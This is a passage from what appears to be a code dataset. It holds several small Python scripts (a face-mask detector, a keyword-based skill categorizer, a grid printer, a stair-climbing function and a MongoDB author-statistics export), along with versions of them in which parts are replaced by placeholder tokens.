cv2.imwrite('faces/with_mask/%dno_mask.jpg' % img_count, color_img)\n dim = 600, 600\n resized = cv2.resize(color_img, dim, interpolation=cv2.INTER_AREA)\n cv2.imshow('LIVE face mask detection', resized)\n cv2.waitKey()\n cv2.destroyAllWindows()\ninput('Press ENTER to exit')\n",
"<import token>\nmodel = load_model('trainedmodel.h5')\nprint(' Enter a option ')\nprint(' 1. Detect Mask using image')\nprint(' 2. Detect Mask using live video')\na = input('Press 1 / 2 : ')\nif a == 2:\n img_width, img_hight = 224, 224\n direc = 'faces'\n a = 511\n img_width, img_hight = 200, 200\n face_cascade = cv2.CascadeClassifier(cv2.data.haarcascades +\n 'haarcascade_frontalface_default.xml')\n cap = cv2.VideoCapture(0)\n img_count_full = 0\n font = cv2.FONT_HERSHEY_SIMPLEX\n org = 1, 1\n class_lable = ' '\n fontScale = 1\n color = 255, 0, 0\n thickness = 2\n while True:\n os.mkdir(direc, a)\n img_count_full += 1\n responce, color_img = cap.read()\n if responce == False:\n break\n gray_img = cv2.cvtColor(color_img, cv2.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray_img, 1.2, 3)\n img_count = 0\n for x, y, w, h in faces:\n org = x - 10, y - 10\n img_count += 1\n color_face = color_img[y:y + h, x:x + w]\n cv2.imwrite('faces/%d%dface.jpg' % (img_count_full, img_count),\n color_face)\n img = load_img('faces/%d%dface.jpg' % (img_count_full,\n img_count), target_size=(img_width, img_hight))\n img = img_to_array(img) / 255\n img = np.expand_dims(img, axis=0)\n pred_prob = model.predict(img)\n pred = np.argmax(pred_prob)\n if pred == 0:\n print('User with mask - predic = ', pred_prob[0][0])\n class_lable = 'Mask'\n color = 0, 255, 0\n else:\n print('user not wearing mask - prob = ', pred_prob[0][1])\n class_lable = 'No Mask'\n color = 0, 0, 255\n cv2.rectangle(color_img, (x, y), (x + w, y + h), color, 3)\n cv2.putText(color_img, class_lable, org, font, fontScale, color,\n thickness, cv2.LINE_AA)\n cv2.imshow('LIVE face mask detection', color_img)\n shutil.rmtree(direc)\n if cv2.waitKey(1) & 255 == ord('q'):\n break\n cap.release()\n cv2.destroyAllWindows()\nelse:\n img_width = 200\n img_hight = 200\n face_cascade = cv2.CascadeClassifier(cv2.data.haarcascades +\n 'haarcascade_frontalface_default.xml')\n font = cv2.FONT_HERSHEY_SIMPLEX\n org = 1, 1\n class_lable = ' '\n fontScale = 1\n color = 255, 0, 0\n thickness = 2\n color_img = cv2.imread('B612_20170324_142650.jpg')\n gray_img = cv2.cvtColor(color_img, cv2.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray_img, scaleFactor=1.2,\n minNeighbors=5, flags=cv2.CASCADE_SCALE_IMAGE)\n img_count = 0\n for x, y, w, h in faces:\n org = x - 10, y - 10\n img_count += 1\n color_face = color_img[y:y + h, x:x + w]\n cv2.imwrite('imgfaces/%dface.jpg' % img_count, color_face)\n img = load_img('imgfaces/%dface.jpg' % img_count, target_size=(\n img_width, img_hight))\n img = img_to_array(img) / 255\n img = np.expand_dims(img, axis=0)\n pred_prob = model.predict(img)\n pred = np.argmax(pred_prob)\n if pred == 0:\n print('User with mask - predic = ', pred_prob[0][0])\n class_lable = 'Mask'\n color = 255, 0, 0\n cv2.imwrite('faces/with_mask/%dface.jpg' % img_count, color_face)\n cv2.rectangle(color_img, (x, y), (x + w, y + h), (0, 0, 255), 3)\n cv2.putText(color_img, class_lable, org, font, fontScale, color,\n thickness, cv2.LINE_AA)\n cv2.imwrite('faces/with_mask/%dmask.jpg' % img_count, color_img)\n else:\n print('user not wearing mask - prob = ', pred_prob[0][1])\n class_lable = 'No Mask'\n color = 0, 255, 0\n cv2.rectangle(color_img, (x, y), (x + w, y + h), (0, 0, 255), 3)\n cv2.putText(color_img, class_lable, org, font, fontScale, color,\n thickness, cv2.LINE_AA)\n cv2.imwrite('faces/with_mask/%dno_mask.jpg' % img_count, color_img)\n dim = 600, 600\n resized = cv2.resize(color_img, dim, interpolation=cv2.INTER_AREA)\n 
cv2.imshow('LIVE face mask detection', resized)\n cv2.waitKey()\n cv2.destroyAllWindows()\ninput('Press ENTER to exit')\n",
"<import token>\n<assignment token>\nprint(' Enter a option ')\nprint(' 1. Detect Mask using image')\nprint(' 2. Detect Mask using live video')\n<assignment token>\nif a == 2:\n img_width, img_hight = 224, 224\n direc = 'faces'\n a = 511\n img_width, img_hight = 200, 200\n face_cascade = cv2.CascadeClassifier(cv2.data.haarcascades +\n 'haarcascade_frontalface_default.xml')\n cap = cv2.VideoCapture(0)\n img_count_full = 0\n font = cv2.FONT_HERSHEY_SIMPLEX\n org = 1, 1\n class_lable = ' '\n fontScale = 1\n color = 255, 0, 0\n thickness = 2\n while True:\n os.mkdir(direc, a)\n img_count_full += 1\n responce, color_img = cap.read()\n if responce == False:\n break\n gray_img = cv2.cvtColor(color_img, cv2.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray_img, 1.2, 3)\n img_count = 0\n for x, y, w, h in faces:\n org = x - 10, y - 10\n img_count += 1\n color_face = color_img[y:y + h, x:x + w]\n cv2.imwrite('faces/%d%dface.jpg' % (img_count_full, img_count),\n color_face)\n img = load_img('faces/%d%dface.jpg' % (img_count_full,\n img_count), target_size=(img_width, img_hight))\n img = img_to_array(img) / 255\n img = np.expand_dims(img, axis=0)\n pred_prob = model.predict(img)\n pred = np.argmax(pred_prob)\n if pred == 0:\n print('User with mask - predic = ', pred_prob[0][0])\n class_lable = 'Mask'\n color = 0, 255, 0\n else:\n print('user not wearing mask - prob = ', pred_prob[0][1])\n class_lable = 'No Mask'\n color = 0, 0, 255\n cv2.rectangle(color_img, (x, y), (x + w, y + h), color, 3)\n cv2.putText(color_img, class_lable, org, font, fontScale, color,\n thickness, cv2.LINE_AA)\n cv2.imshow('LIVE face mask detection', color_img)\n shutil.rmtree(direc)\n if cv2.waitKey(1) & 255 == ord('q'):\n break\n cap.release()\n cv2.destroyAllWindows()\nelse:\n img_width = 200\n img_hight = 200\n face_cascade = cv2.CascadeClassifier(cv2.data.haarcascades +\n 'haarcascade_frontalface_default.xml')\n font = cv2.FONT_HERSHEY_SIMPLEX\n org = 1, 1\n class_lable = ' '\n fontScale = 1\n color = 255, 0, 0\n thickness = 2\n color_img = cv2.imread('B612_20170324_142650.jpg')\n gray_img = cv2.cvtColor(color_img, cv2.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray_img, scaleFactor=1.2,\n minNeighbors=5, flags=cv2.CASCADE_SCALE_IMAGE)\n img_count = 0\n for x, y, w, h in faces:\n org = x - 10, y - 10\n img_count += 1\n color_face = color_img[y:y + h, x:x + w]\n cv2.imwrite('imgfaces/%dface.jpg' % img_count, color_face)\n img = load_img('imgfaces/%dface.jpg' % img_count, target_size=(\n img_width, img_hight))\n img = img_to_array(img) / 255\n img = np.expand_dims(img, axis=0)\n pred_prob = model.predict(img)\n pred = np.argmax(pred_prob)\n if pred == 0:\n print('User with mask - predic = ', pred_prob[0][0])\n class_lable = 'Mask'\n color = 255, 0, 0\n cv2.imwrite('faces/with_mask/%dface.jpg' % img_count, color_face)\n cv2.rectangle(color_img, (x, y), (x + w, y + h), (0, 0, 255), 3)\n cv2.putText(color_img, class_lable, org, font, fontScale, color,\n thickness, cv2.LINE_AA)\n cv2.imwrite('faces/with_mask/%dmask.jpg' % img_count, color_img)\n else:\n print('user not wearing mask - prob = ', pred_prob[0][1])\n class_lable = 'No Mask'\n color = 0, 255, 0\n cv2.rectangle(color_img, (x, y), (x + w, y + h), (0, 0, 255), 3)\n cv2.putText(color_img, class_lable, org, font, fontScale, color,\n thickness, cv2.LINE_AA)\n cv2.imwrite('faces/with_mask/%dno_mask.jpg' % img_count, color_img)\n dim = 600, 600\n resized = cv2.resize(color_img, dim, interpolation=cv2.INTER_AREA)\n cv2.imshow('LIVE face mask detection', 
resized)\n cv2.waitKey()\n cv2.destroyAllWindows()\ninput('Press ENTER to exit')\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n"
] | false |
99,802 | 3ae9d2c3b414054973c3a884a71b4ab2e73911d9 | import pandas as pd
import dataframe
data = pd.read_csv(r'D:\Academic\Level 4 - Semester 1\Research Project\Categorized Data\Skills\Book11.csv', names=['category'])
df = pd.DataFrame(data)
a = ['software', 'developer', 'programmer', 'Programming', 'Hibernate', 'Web', 'Mobile', 'Android', 'iOS', 'Agile', 'OOP', 'JS', 'Design Patterns', 'Technical Lead', 'Tech Lead', 'Support Engineer', 'Enterprise Application Development', 'Maven', 'SDLC']
b = ['QA', 'Tester', 'Quality', 'Automation', 'Selenium', 'Testing', 'Test']
e = ['Business', 'Functional Analyst', ' Solution', 'System Analyst', 'Requirements Analysis']
f = ['Networking', 'Switches', 'Cisco Packet Tracer', 'Wireless', 'Network', 'TCP', 'LAN-WAN']
i = ['Manager', 'owner', 'Management', 'Director', 'Strategy']
j = ['PHD', 'MSC', 'postgraduate', 'Research']
l = ['Lecturer', 'tutor', 'Instructor', 'Demonstrator']
m = ['Database', 'MySQL', 'Oracle', 'SQL', 'Apache', ' MongoDB ']
n = ['Data Science', 'Machine Learning', 'Data Scientist', 'Data Analysis', 'Statistics', 'Data Mining']
p = ['Computer Science', 'Computer Engineering', 'Systems Engineer', 'System Administrator', 'System Administration']
q = ['Information Technology', 'ICT']
r = ['Computer Architecture']
s = ['Distributed System', 'Cluster Computing']
t = ['Cloud Computing']
u = ['Algorithms', 'Data Structures']
w = ['JAVA', 'Python', 'HTML', '.NET', 'Ruby', 'COBOL', 'XML', ' jQuery', 'Bootstrap', 'PHP', 'Cascading Style Sheets']
x = ['Mathematics', 'Physical Science', 'physics']
y = ['Operating Systems', 'Windows', 'Ubuntu', 'Linux', 'Unix']
za = ['Multimedia', 'Animation', 'Graphic', 'Digital Media']
ab = ['Cyber', 'Information Security']
ac = ['Information System']
ad = ['Artificial Intelligence', 'Deep Learning', 'Computer Vision', 'Robotics', 'Natural Language']
ae = ['Bioinformatics', 'Biology', 'Biomedical']
af = ['Telecommunication', 'Communication']
ag = ['Computer Hardware', 'Embedded System', 'Microcontrollers ', 'Electronic', 'Internet of Things', 'Arduino', 'PCB Design']
ah = ['Marketing', 'E-Commerce', 'Banking', 'Finance', 'Account', 'Customer', 'Sales', 'Pricing', 'Markets']
aj = ['E-Governance', 'Legal', 'Law']
ak = ['Geography', 'Geographic', 'GIS', 'Geoinformatics']
al = ['Human Computer Interaction', 'User Interface', 'User Experience', 'UI/UX']
ao = ['Big Data', 'Hadoop']
g = 'Software Engineering'
z = 'Quality Assurance'
ee = 'Business Analysis'
ff = 'Networking'
ii = 'Management'
jj = 'Research'
ll = 'Lecturing'
mm = 'Database'
nn = 'Data Science'
pp = 'Computer Science'
qq = 'Information Technology'
rr = 'Computer Architecture'
ss = 'Distributed System'
tt = 'Cloud Computing'
uu = 'Data Structures and Algorithms'
ww = 'Programming Languages'
xx = 'Mathematics'
yy = 'Operating Systems'
zz = 'Multimedia, Animation and Graphic Design'
abb = 'Cyber Security'
acc = 'Information System'
add = 'Artificial Intelligence'
aee = 'Bio-informatics'
aff = 'Telecommunication'
agg = 'Embedded System'
ahh = 'Marketing and E-Commerce'
ajj = 'E-Governance'
akk = 'GIS'
all = 'HCI'
aoo = 'Big Data'
c='Other'
d = {g:a, z:b, ee:e, ff:f, ii:i, jj:j, ll:l, mm:m, nn:n, pp:p, zz:za, qq:q, rr:r, ss:s, tt:t, uu:u, ww:w, xx:x, yy:y, abb:ab, acc:ac, add:ad, aee:ae,aff:af, agg:ag, ahh:ah, akk:ak, all:al, aoo:ao}
df['new_category'] = c
for k, v in d.items():
    pat = '|'.join(v)
    mask = df.category.str.contains(pat, case=False)
    df.loc[mask, 'new_category'] = k
df.to_csv(r'D:\Academic\Level 4 - Semester 1\Research Project\Categorized Data\Skill8.csv', index=False)
| [
"import pandas as pd\nimport dataframe\n\ndata = pd.read_csv(r'D:\\Academic\\Level 4 - Semester 1\\Research Project\\Categorized Data\\Skills\\Book11.csv', names=['category'])\n\ndf = pd.DataFrame(data)\n\na = ['software', 'developer', 'programmer', 'Programming', 'Hibernate', 'Web', 'Mobile', 'Android', 'iOS', 'Agile', 'OOP', 'JS', 'Design Patterns', 'Technical Lead', 'Tech Lead', 'Support Engineer', 'Enterprise Application Development', 'Maven', 'SDLC']\nb = ['QA', 'Tester', 'Quality', 'Automation', 'Selenium', 'Testing', 'Test']\ne = ['Business', 'Functional Analyst', ' Solution', 'System Analyst', 'Requirements Analysis']\nf = ['Networking', 'Switches', 'Cisco Packet Tracer', 'Wireless', 'Network', 'TCP', 'LAN-WAN']\ni = ['Manager', 'owner', 'Management', 'Director', 'Strategy']\nj = ['PHD', 'MSC', 'postgraduate', 'Research']\nl = ['Lecturer', 'tutor', 'Instructor', 'Demonstrator']\nm = ['Database', 'MySQL', 'Oracle', 'SQL', 'Apache', ' MongoDB ']\nn = ['Data Science', 'Machine Learning', 'Data Scientist', 'Data Analysis', 'Statistics', 'Data Mining']\np = ['Computer Science', 'Computer Engineering', 'Systems Engineer', 'System Administrator', 'System Administration']\nq = ['Information Technology', 'ICT']\nr = ['Computer Architecture']\ns = ['Distributed System', 'Cluster Computing']\nt = ['Cloud Computing']\nu = ['Algorithms', 'Data Structures']\nw = ['JAVA', 'Python', 'HTML', '.NET', 'Ruby', 'COBOL', 'XML', ' jQuery', 'Bootstrap', 'PHP', 'Cascading Style Sheets']\nx = ['Mathematics', 'Physical Science', 'physics']\ny = ['Operating Systems', 'Windows', 'Ubuntu', 'Linux', 'Unix']\nza = ['Multimedia', 'Animation', 'Graphic', 'Digital Media']\nab = ['Cyber', 'Information Security']\nac = ['Information System']\nad = ['Artificial Intelligence', 'Deep Learning', 'Computer Vision', 'Robotics', 'Natural Language']\nae = ['Bioinformatics', 'Biology', 'Biomedical']\naf = ['Telecommunication', 'Communication']\nag = ['Computer Hardware', 'Embedded System', 'Microcontrollers ', 'Electronic', 'Internet of Things', 'Arduino', 'PCB Design']\nah = ['Marketing', 'E-Commerce', 'Banking', 'Finance', 'Account', 'Customer', 'Sales', 'Pricing', 'Markets']\naj = ['E-Governance', 'Legal', 'Law']\nak = ['Geography', 'Geographic', 'GIS', 'Geoinformatics']\nal = ['Human Computer Interaction', 'User Interface', 'User Experience', 'UI/UX']\nao = ['Big Data', 'Hadoop']\n\n\ng = 'Software Engineering'\nz = 'Quality Assurance'\nee = 'Business Analysis'\nff = 'Networking'\nii = 'Management'\njj = 'Research'\nll = 'Lecturing'\nmm = 'Database'\nnn = 'Data Science'\npp = 'Computer Science'\nqq = 'Information Technology'\nrr = 'Computer Architecture'\nss = 'Distributed System'\ntt = 'Cloud Computing'\nuu = 'Data Structures and Algorithms'\nww = 'Programming Languages'\nxx = 'Mathematics'\nyy = 'Operating Systems'\nzz = 'Multimedia, Animation and Graphic Design'\nabb = 'Cyber Security'\nacc = 'Information System'\nadd = 'Artificial Intelligence'\naee = 'Bio-informatics'\naff = 'Telecommunication'\nagg = 'Embedded System'\nahh = 'Marketing and E-Commerce'\najj = 'E-Governance'\nakk = 'GIS'\nall = 'HCI'\naoo = 'Big Data'\n\n\nc='Other'\n\nd = {g:a, z:b, ee:e, ff:f, ii:i, jj:j, ll:l, mm:m, nn:n, pp:p, zz:za, qq:q, rr:r, ss:s, tt:t, uu:u, ww:w, xx:x, yy:y, abb:ab, acc:ac, add:ad, aee:ae,aff:af, agg:ag, ahh:ah, akk:ak, all:al, aoo:ao}\n\ndf['new_category'] = c\n\nfor k, v in d.items():\n pat = '|'.join(v)\n mask = df.category.str.contains(pat, case=False)\n\n df.loc[mask, 'new_category'] = 
k\n\n\ndf.to_csv(r'D:\\Academic\\Level 4 - Semester 1\\Research Project\\Categorized Data\\Skill8.csv', index=False)\n",
"import pandas as pd\nimport dataframe\ndata = pd.read_csv(\n 'D:\\\\Academic\\\\Level 4 - Semester 1\\\\Research Project\\\\Categorized Data\\\\Skills\\\\Book11.csv'\n , names=['category'])\ndf = pd.DataFrame(data)\na = ['software', 'developer', 'programmer', 'Programming', 'Hibernate',\n 'Web', 'Mobile', 'Android', 'iOS', 'Agile', 'OOP', 'JS',\n 'Design Patterns', 'Technical Lead', 'Tech Lead', 'Support Engineer',\n 'Enterprise Application Development', 'Maven', 'SDLC']\nb = ['QA', 'Tester', 'Quality', 'Automation', 'Selenium', 'Testing', 'Test']\ne = ['Business', 'Functional Analyst', ' Solution', 'System Analyst',\n 'Requirements Analysis']\nf = ['Networking', 'Switches', 'Cisco Packet Tracer', 'Wireless', 'Network',\n 'TCP', 'LAN-WAN']\ni = ['Manager', 'owner', 'Management', 'Director', 'Strategy']\nj = ['PHD', 'MSC', 'postgraduate', 'Research']\nl = ['Lecturer', 'tutor', 'Instructor', 'Demonstrator']\nm = ['Database', 'MySQL', 'Oracle', 'SQL', 'Apache', ' MongoDB ']\nn = ['Data Science', 'Machine Learning', 'Data Scientist', 'Data Analysis',\n 'Statistics', 'Data Mining']\np = ['Computer Science', 'Computer Engineering', 'Systems Engineer',\n 'System Administrator', 'System Administration']\nq = ['Information Technology', 'ICT']\nr = ['Computer Architecture']\ns = ['Distributed System', 'Cluster Computing']\nt = ['Cloud Computing']\nu = ['Algorithms', 'Data Structures']\nw = ['JAVA', 'Python', 'HTML', '.NET', 'Ruby', 'COBOL', 'XML', ' jQuery',\n 'Bootstrap', 'PHP', 'Cascading Style Sheets']\nx = ['Mathematics', 'Physical Science', 'physics']\ny = ['Operating Systems', 'Windows', 'Ubuntu', 'Linux', 'Unix']\nza = ['Multimedia', 'Animation', 'Graphic', 'Digital Media']\nab = ['Cyber', 'Information Security']\nac = ['Information System']\nad = ['Artificial Intelligence', 'Deep Learning', 'Computer Vision',\n 'Robotics', 'Natural Language']\nae = ['Bioinformatics', 'Biology', 'Biomedical']\naf = ['Telecommunication', 'Communication']\nag = ['Computer Hardware', 'Embedded System', 'Microcontrollers ',\n 'Electronic', 'Internet of Things', 'Arduino', 'PCB Design']\nah = ['Marketing', 'E-Commerce', 'Banking', 'Finance', 'Account',\n 'Customer', 'Sales', 'Pricing', 'Markets']\naj = ['E-Governance', 'Legal', 'Law']\nak = ['Geography', 'Geographic', 'GIS', 'Geoinformatics']\nal = ['Human Computer Interaction', 'User Interface', 'User Experience',\n 'UI/UX']\nao = ['Big Data', 'Hadoop']\ng = 'Software Engineering'\nz = 'Quality Assurance'\nee = 'Business Analysis'\nff = 'Networking'\nii = 'Management'\njj = 'Research'\nll = 'Lecturing'\nmm = 'Database'\nnn = 'Data Science'\npp = 'Computer Science'\nqq = 'Information Technology'\nrr = 'Computer Architecture'\nss = 'Distributed System'\ntt = 'Cloud Computing'\nuu = 'Data Structures and Algorithms'\nww = 'Programming Languages'\nxx = 'Mathematics'\nyy = 'Operating Systems'\nzz = 'Multimedia, Animation and Graphic Design'\nabb = 'Cyber Security'\nacc = 'Information System'\nadd = 'Artificial Intelligence'\naee = 'Bio-informatics'\naff = 'Telecommunication'\nagg = 'Embedded System'\nahh = 'Marketing and E-Commerce'\najj = 'E-Governance'\nakk = 'GIS'\nall = 'HCI'\naoo = 'Big Data'\nc = 'Other'\nd = {g: a, z: b, ee: e, ff: f, ii: i, jj: j, ll: l, mm: m, nn: n, pp: p, zz:\n za, qq: q, rr: r, ss: s, tt: t, uu: u, ww: w, xx: x, yy: y, abb: ab,\n acc: ac, add: ad, aee: ae, aff: af, agg: ag, ahh: ah, akk: ak, all: al,\n aoo: ao}\ndf['new_category'] = c\nfor k, v in d.items():\n pat = '|'.join(v)\n mask = df.category.str.contains(pat, case=False)\n 
df.loc[mask, 'new_category'] = k\ndf.to_csv(\n 'D:\\\\Academic\\\\Level 4 - Semester 1\\\\Research Project\\\\Categorized Data\\\\Skill8.csv'\n , index=False)\n",
"<import token>\ndata = pd.read_csv(\n 'D:\\\\Academic\\\\Level 4 - Semester 1\\\\Research Project\\\\Categorized Data\\\\Skills\\\\Book11.csv'\n , names=['category'])\ndf = pd.DataFrame(data)\na = ['software', 'developer', 'programmer', 'Programming', 'Hibernate',\n 'Web', 'Mobile', 'Android', 'iOS', 'Agile', 'OOP', 'JS',\n 'Design Patterns', 'Technical Lead', 'Tech Lead', 'Support Engineer',\n 'Enterprise Application Development', 'Maven', 'SDLC']\nb = ['QA', 'Tester', 'Quality', 'Automation', 'Selenium', 'Testing', 'Test']\ne = ['Business', 'Functional Analyst', ' Solution', 'System Analyst',\n 'Requirements Analysis']\nf = ['Networking', 'Switches', 'Cisco Packet Tracer', 'Wireless', 'Network',\n 'TCP', 'LAN-WAN']\ni = ['Manager', 'owner', 'Management', 'Director', 'Strategy']\nj = ['PHD', 'MSC', 'postgraduate', 'Research']\nl = ['Lecturer', 'tutor', 'Instructor', 'Demonstrator']\nm = ['Database', 'MySQL', 'Oracle', 'SQL', 'Apache', ' MongoDB ']\nn = ['Data Science', 'Machine Learning', 'Data Scientist', 'Data Analysis',\n 'Statistics', 'Data Mining']\np = ['Computer Science', 'Computer Engineering', 'Systems Engineer',\n 'System Administrator', 'System Administration']\nq = ['Information Technology', 'ICT']\nr = ['Computer Architecture']\ns = ['Distributed System', 'Cluster Computing']\nt = ['Cloud Computing']\nu = ['Algorithms', 'Data Structures']\nw = ['JAVA', 'Python', 'HTML', '.NET', 'Ruby', 'COBOL', 'XML', ' jQuery',\n 'Bootstrap', 'PHP', 'Cascading Style Sheets']\nx = ['Mathematics', 'Physical Science', 'physics']\ny = ['Operating Systems', 'Windows', 'Ubuntu', 'Linux', 'Unix']\nza = ['Multimedia', 'Animation', 'Graphic', 'Digital Media']\nab = ['Cyber', 'Information Security']\nac = ['Information System']\nad = ['Artificial Intelligence', 'Deep Learning', 'Computer Vision',\n 'Robotics', 'Natural Language']\nae = ['Bioinformatics', 'Biology', 'Biomedical']\naf = ['Telecommunication', 'Communication']\nag = ['Computer Hardware', 'Embedded System', 'Microcontrollers ',\n 'Electronic', 'Internet of Things', 'Arduino', 'PCB Design']\nah = ['Marketing', 'E-Commerce', 'Banking', 'Finance', 'Account',\n 'Customer', 'Sales', 'Pricing', 'Markets']\naj = ['E-Governance', 'Legal', 'Law']\nak = ['Geography', 'Geographic', 'GIS', 'Geoinformatics']\nal = ['Human Computer Interaction', 'User Interface', 'User Experience',\n 'UI/UX']\nao = ['Big Data', 'Hadoop']\ng = 'Software Engineering'\nz = 'Quality Assurance'\nee = 'Business Analysis'\nff = 'Networking'\nii = 'Management'\njj = 'Research'\nll = 'Lecturing'\nmm = 'Database'\nnn = 'Data Science'\npp = 'Computer Science'\nqq = 'Information Technology'\nrr = 'Computer Architecture'\nss = 'Distributed System'\ntt = 'Cloud Computing'\nuu = 'Data Structures and Algorithms'\nww = 'Programming Languages'\nxx = 'Mathematics'\nyy = 'Operating Systems'\nzz = 'Multimedia, Animation and Graphic Design'\nabb = 'Cyber Security'\nacc = 'Information System'\nadd = 'Artificial Intelligence'\naee = 'Bio-informatics'\naff = 'Telecommunication'\nagg = 'Embedded System'\nahh = 'Marketing and E-Commerce'\najj = 'E-Governance'\nakk = 'GIS'\nall = 'HCI'\naoo = 'Big Data'\nc = 'Other'\nd = {g: a, z: b, ee: e, ff: f, ii: i, jj: j, ll: l, mm: m, nn: n, pp: p, zz:\n za, qq: q, rr: r, ss: s, tt: t, uu: u, ww: w, xx: x, yy: y, abb: ab,\n acc: ac, add: ad, aee: ae, aff: af, agg: ag, ahh: ah, akk: ak, all: al,\n aoo: ao}\ndf['new_category'] = c\nfor k, v in d.items():\n pat = '|'.join(v)\n mask = df.category.str.contains(pat, case=False)\n df.loc[mask, 'new_category'] = 
k\ndf.to_csv(\n 'D:\\\\Academic\\\\Level 4 - Semester 1\\\\Research Project\\\\Categorized Data\\\\Skill8.csv'\n , index=False)\n",
"<import token>\n<assignment token>\nfor k, v in d.items():\n pat = '|'.join(v)\n mask = df.category.str.contains(pat, case=False)\n df.loc[mask, 'new_category'] = k\ndf.to_csv(\n 'D:\\\\Academic\\\\Level 4 - Semester 1\\\\Research Project\\\\Categorized Data\\\\Skill8.csv'\n , index=False)\n",
"<import token>\n<assignment token>\n<code token>\n"
] | false |
99,803 | 0f6006529d03e74103155c3e8851b1ca3de6ca87 | #Character Picture Grid
#Copy the following grid value, and write code that uses it to print the image.
grid = [['.', '.', '.', '.', '.', '.'],
        ['.', 'O', 'O', '.', '.', '.'],
        ['O', 'O', 'O', 'O', '.', '.'],
        ['O', 'O', 'O', 'O', 'O', '.'],
        ['.', 'O', 'O', 'O', 'O', 'O'],
        ['O', 'O', 'O', 'O', 'O', '.'],
        ['O', 'O', 'O', 'O', '.', '.'],
        ['.', 'O', 'O', '.', '.', '.'],
        ['.', '.', '.', '.', '.', '.']] # 9 x 6
#print a 6 x 9 string
width = len(grid[0]) #6
height = len(grid) #9
for j in range(width):
    for i in range(height-1):
        print(grid[i][j],end = '')
    print(grid[height-1][j])
| [
"#Character Picture Grid\r\n#Copy the following grid value, and write code that uses it to print the image.\r\ngrid = [['.', '.', '.', '.', '.', '.'],\r\n ['.', 'O', 'O', '.', '.', '.'],\r\n ['O', 'O', 'O', 'O', '.', '.'],\r\n ['O', 'O', 'O', 'O', 'O', '.'],\r\n ['.', 'O', 'O', 'O', 'O', 'O'],\r\n ['O', 'O', 'O', 'O', 'O', '.'],\r\n ['O', 'O', 'O', 'O', '.', '.'],\r\n ['.', 'O', 'O', '.', '.', '.'],\r\n ['.', '.', '.', '.', '.', '.']] # 9 x 6\r\n\r\n#print a 6 x 9 string\r\n\r\nwidth = len(grid[0]) #6\r\nheight = len(grid) #9\r\n\r\nfor j in range(width):\r\n for i in range(height-1):\r\n print(grid[i][j],end = '')\r\n print(grid[height-1][j])\r\n\r\n",
"grid = [['.', '.', '.', '.', '.', '.'], ['.', 'O', 'O', '.', '.', '.'], [\n 'O', 'O', 'O', 'O', '.', '.'], ['O', 'O', 'O', 'O', 'O', '.'], ['.',\n 'O', 'O', 'O', 'O', 'O'], ['O', 'O', 'O', 'O', 'O', '.'], ['O', 'O',\n 'O', 'O', '.', '.'], ['.', 'O', 'O', '.', '.', '.'], ['.', '.', '.',\n '.', '.', '.']]\nwidth = len(grid[0])\nheight = len(grid)\nfor j in range(width):\n for i in range(height - 1):\n print(grid[i][j], end='')\n print(grid[height - 1][j])\n",
"<assignment token>\nfor j in range(width):\n for i in range(height - 1):\n print(grid[i][j], end='')\n print(grid[height - 1][j])\n",
"<assignment token>\n<code token>\n"
] | false |
99,804 | 7a5df86755d25405959fa1c2a075354775a64110 | def number_of_ways_to_top(top, maximum_step):
    if top == 0 :
        return 1
    dp = [0]*(top+1) #dp[i] = number off ways to climb up i stairs
    dp[0] = 1
    for i in range(1,top+1):
        j = 1
        while j <= i and j <= maximum_step :
            dp[i]+=dp[i-j]
            j+=1
    return dp[top]
if __name__ == "__main__":
    n, k = 4, 2
    print(number_of_ways_to_top(n,k))
"def number_of_ways_to_top(top, maximum_step):\n if top == 0 :\n return 1\n dp = [0]*(top+1) #dp[i] = number off ways to climb up i stairs\n dp[0] = 1\n for i in range(1,top+1):\n j = 1\n while j <= i and j <= maximum_step :\n dp[i]+=dp[i-j]\n j+=1\n return dp[top]\n\nif __name__ == \"__main__\":\n n, k = 4, 2\n print(number_of_ways_to_top(n,k))",
"def number_of_ways_to_top(top, maximum_step):\n if top == 0:\n return 1\n dp = [0] * (top + 1)\n dp[0] = 1\n for i in range(1, top + 1):\n j = 1\n while j <= i and j <= maximum_step:\n dp[i] += dp[i - j]\n j += 1\n return dp[top]\n\n\nif __name__ == '__main__':\n n, k = 4, 2\n print(number_of_ways_to_top(n, k))\n",
"def number_of_ways_to_top(top, maximum_step):\n if top == 0:\n return 1\n dp = [0] * (top + 1)\n dp[0] = 1\n for i in range(1, top + 1):\n j = 1\n while j <= i and j <= maximum_step:\n dp[i] += dp[i - j]\n j += 1\n return dp[top]\n\n\n<code token>\n",
"<function token>\n<code token>\n"
] | false |
99,805 | 7e5728ef15af5fa20c7269e1a4786fbeac70dec7 | #!/usr/bin/python
# -*- coding: UTF-8 -*-
# Exports a CSV with top authors and their publications, to check a) disambiguation and b) h-index
__author__ = """Giovanni Colavizza"""
import codecs
# MongoDB
from pymongo import MongoClient
from configparser import ConfigParser
config_set = "localhost" # this is in localhost
config = ConfigParser(allow_no_value=False)
config.read("config/config.conf")
mongo_db = config.get(config_set, 'db-name')
mongo_user = config.get(config_set, 'username')
mongo_pwd = config.get(config_set, 'password')
mongo_auth = config.get(config_set, 'auth-db')
mongo_host = config.get(config_set, 'db-host')
mongo_port = config.get(config_set, 'db-port')
client = MongoClient(mongo_host)
db = client[mongo_db]
db.authenticate(mongo_user, mongo_pwd, source=mongo_auth)
collection = db.stats_dev
collection_authors = db.authors_dev
limit = 10
# get records
authors = list()
for record in collection_authors.find():
authors.append({"tot_cit":record["tot_cit"],"name":record["name"],"n_pub":len(record["publications"]),"publications":record["publications"],"h_index":record["h_index"]})
authors = sorted(authors,key=lambda x:x["n_pub"],reverse=True)
with codecs.open("exports/evaluation_authors.csv","w",encoding="utf8") as f:
f.write("id,name,h_index,tot_cit,publication_title,pub_year,n_cit\n")
for n,a in enumerate(authors[:limit]):
for p in a["publications"]:
title = p["title"].replace('"','')
title = title.replace('\n', ' ')
title = title.replace('\r', ' ')
f.write(str(n)+","+'"'+a["name"]+'"'+","+str(a["h_index"])+","+str(a["tot_cit"])+","+'"'+title+'"'+","+str(p["year"])+","+str(p["n_cit"])+"\n")
| [
